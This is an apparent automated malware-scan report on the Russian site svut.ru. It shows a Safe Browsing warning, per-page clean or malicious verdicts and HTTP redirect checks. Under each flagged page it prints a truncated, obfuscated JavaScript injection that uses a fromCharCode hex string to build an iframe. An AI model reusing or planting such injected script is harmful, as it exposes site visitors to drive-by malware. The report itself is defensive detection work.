Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=svut.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://svut.ru/ | 200 OK Content-Length: 10773 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19489 Content-Type: text/javascript | clean |
http://svut.ru/proza.htm | 200 OK Content-Length: 12874 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/rezen.htm | 200 OK Content-Length: 6685 Content-Type: text/html | clean |
http://svut.ru/films.htm | 200 OK Content-Length: 12672 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/alife.htm | 200 OK Content-Length: 19690 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/about.htm | 200 OK Content-Length: 5168 Content-Type: text/html | clean |
http://svut.ru/svutchat.htm | 200 OK Content-Length: 9151 Content-Type: text/html | clean |
http://svut.ru/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://svut.ru/alife/vyhozhu_odin.html | 200 OK Content-Length: 20499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/alife/../proza.htm | 200 OK Content-Length: 12874 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/alife/../rezen.htm | 200 OK Content-Length: 6685 Content-Type: text/html | clean |
http://svut.ru/alife/../films.htm | 200 OK Content-Length: 12672 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/alife/../alife.htm | 200 OK Content-Length: 19690 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://svut.ru/alife/../about.htm | 200 OK Content-Length: 5168 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: svut.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 10:22:29 GMT
Accept-Ranges: bytes
ETag: "524ef726-2a15"
Server: nginx/1.4.7
Content-Length: 10773
Content-Type: text/html; charset=utf-8
Last-Modified: Fri, 04 Oct 2013 17:13:10 GMT
...10773 bytes of data.
GET / HTTP/1.1
Host: svut.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 10:22:29 GMT
Accept-Ranges: bytes
ETag: "524ef726-2a15"
Server: nginx/1.4.7
Content-Length: 10773
Content-Type: text/html; charset=utf-8
Last-Modified: Fri, 04 Oct 2013 17:13:10 GMT
...10773 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: svut.ru
Referer: http://www.google.com/search?q=svut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: svut.ru
Referer: http://www.google.com/search?q=svut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.